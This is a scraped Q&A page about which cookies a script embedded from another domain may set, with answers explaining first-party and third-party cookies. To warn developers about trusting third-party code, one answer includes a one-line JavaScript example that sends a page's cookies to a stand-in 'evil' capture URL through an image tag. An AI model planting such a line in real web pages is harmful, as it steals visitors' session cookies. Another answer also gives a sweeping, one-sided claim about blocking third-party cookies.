Menu
I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a.com and a web page served by b.com embeds a script in that web page which lives on my server:
<script src='a.com/script.js'></script>
What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a.com? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b.com since the page is served from that server?
I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.
888
The main differences between first and third-party cookies include: Setting the cookie: A first-party cookie is set by the publisher's web server or any JavaScript loaded on the website. A third-party cookie can be set by a third-party server, such as an AdTech vendor, or via code loaded on the publisher's website.
First-party cookies are created by the website a user visits directly. For example, if you visit cnn.com, thehuffingtonpost.com, and nytimes.com, then all those sites will create a cookie (one for each site) and save them to your computer. Third-party cookies are created by other parties, not the website.
Unlike a first-party cookie set by the website's server, a third-party cookie is usually set by a third-party domain/server (i.e. an ad-based vendor). Third-party cookies are dropped via a specific vendor code or tag deployed on a particular website and stored under a different domain.
Third-party cookies follow you around the web, but they have no impact on user experience. This is why you should always block third-party cookies if given the option. Third-party cookies are also known as tracking cookies, because they “track” your behavior to serve more relevant ads to you.
I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.
If I visit http://www.b.com/ and it includes
<script src="http://www.a.com/some/file.js"></script>
Then b.com is trusting a.com's code to act in good faith. The code executes as part of the page being viewed. Since the javascript code will execute in the browser, it could read cookies from b.com and pass that data along by creating an tag in the document where src includes the data.
For example, if a.com's javascript file includes
document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
Then the malicious webmaster of a.com could check his web server logs and see b.com's cookies.
So, the question is, if a.com is malicious, why did b.com include code from a.com in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.
126
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
